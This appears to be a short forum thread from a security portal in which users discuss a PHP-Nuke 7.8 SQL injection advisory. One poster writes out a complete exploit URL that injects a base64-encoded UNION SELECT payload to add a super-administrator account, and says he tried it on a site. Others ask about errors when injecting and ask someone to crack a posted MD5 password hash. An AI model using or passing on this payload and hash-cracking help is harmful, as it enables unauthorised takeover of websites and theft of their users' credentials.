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IT Security and Insecurity Portal |
SO how do I use this?
What URL should I use to make a new admin with pass=coolpass and admin=waraxe?
NewAngels Advisory #7]PHP Nuke <= 7.8 Multiple SQL Injections
=========================== ... |
I tried the admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox on a site ... |
I get a 406-error when I try stuff with UNION like this...
Anyone know what that is? |
Its a hash created by phpnuke and is stored in my SQL table
Can you decode it or know a site which can? |
I tried folowing hash on passcracker.co, but didnt work. COuld someone give me the pass of this md5 hash?
de8b2d7cb07422fbc51bc0d89aa29ced |
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